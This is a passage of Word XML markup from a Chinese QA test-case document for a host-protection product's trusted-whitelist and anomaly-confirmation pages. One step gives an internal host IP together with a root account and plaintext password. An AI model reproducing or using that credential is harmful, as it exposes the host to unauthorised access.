      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="78CDBB3C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15929D52"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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34A9FFF9"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PC电脑、</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="2564FD17" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0794ED74"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预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="776629F8"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PC可以访问被测试的系统web端地址链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="0F4DC6D1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E4E27B5"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测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0756281E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 点击界面中“可信白名单”，跳转至可信防护页面下的可信白名单页面。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="7C466702" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="3775"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35D0F114"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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BBD6C1A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="1f4"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>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1</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在“可信白名单”界面即可以看到被测试信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CE8E123"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C0DA174" wp14:editId="21F7A2CE">
                  <wp:extent cx="4143375" cy="2887345"/>
                  <wp:effectExtent l="0" t="0" r="22225" b="825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27" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4187543" cy="2918674"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D11BE54" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 选中列表数据，点击 删除按钮 ，进行删除操作</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CBF625A"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="342D6D23" wp14:editId="4DC0A950">
                  <wp:extent cx="4152900" cy="2547620"/>
                  <wp:effectExtent l="0" t="0" r="12700" b="1778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28" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4152900" cy="2547620"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="752CD542" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:snapToGrid/>
              <w:spacing w:beforeLines="0" w:before="0" w:afterLines="0" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>搜索下拉框，可以根据：主机名 ；文件哈希；文件路径 等类型，在输入</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>框数据涮</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>选</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53FE3884" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="732C347B" wp14:editId="01E64B66">
                  <wp:extent cx="4171950" cy="2463165"/>
                  <wp:effectExtent l="0" t="0" r="19050" b="63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29" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4171950" cy="2463165"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ACAFD63" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3867AC36" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="60DCD572" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33EABE4D"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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F934C24" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12F5647D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="1f4"/>
        <w:ind w:left="1080" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1CBC5D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="002A0233">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="276" w:name="_Toc36487923"/>
      <w:bookmarkStart w:id="277" w:name="_Toc36630318"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可信防护-异常确认界面列表测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="276"/>
      <w:bookmarkEnd w:id="277"/>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691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="0C2B0044" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48733B63"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测试用例标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07BA2BB2"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可信防护-异常确认列表功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="567D0A58" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B5F7CF"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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27F0A880"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PC电脑、</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="3F3E7514" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1602B5A0"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预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00FE84EF"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PC可以访问被测试的系统web端地址链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="17BF109A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A1E5935"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测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59511C7F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 点击界面中“异常确认”，跳转至可信防护页面下的异常确认页面。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="24BE8662" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="3775"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17EC9CF8"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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B4E9255" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="1f4"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>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t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在“异常确认”界面即可以看到被测试信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4050C895"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AE72D24" wp14:editId="11BBBAEA">
                  <wp:extent cx="4124325" cy="2362835"/>
                  <wp:effectExtent l="0" t="0" r="15875" b="2476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30" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4124325" cy="2362835"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="762BBFC9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 生成异常确认信息操作：用Xsh</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ll工具连接开启保护的主机（主机：</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>10.200.171.215</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">账号：root </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">密码：Sysb@15L </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>）输入命令执行、查看 、修改 文档内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0769830D"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69FE5EB9" wp14:editId="5E84D67E">
                  <wp:extent cx="4114800" cy="1412240"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1016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4114800" cy="1412240"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="75D5351A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 操作后“异常确认”界面列表显示文件 </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">205kexin.txt </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>文件的警告信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F632D2B"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noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29258035" wp14:editId="1EB44254">
                  <wp:extent cx="4114800" cy="1675130"/>
                  <wp:effectExtent l="0" t="0" r="0" b="127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cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="1675130"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AC894DF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C042F71" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>选中列表数据，点击“确认信息”按钮，数据添加到“可信白名单”页面列表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379CC26A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
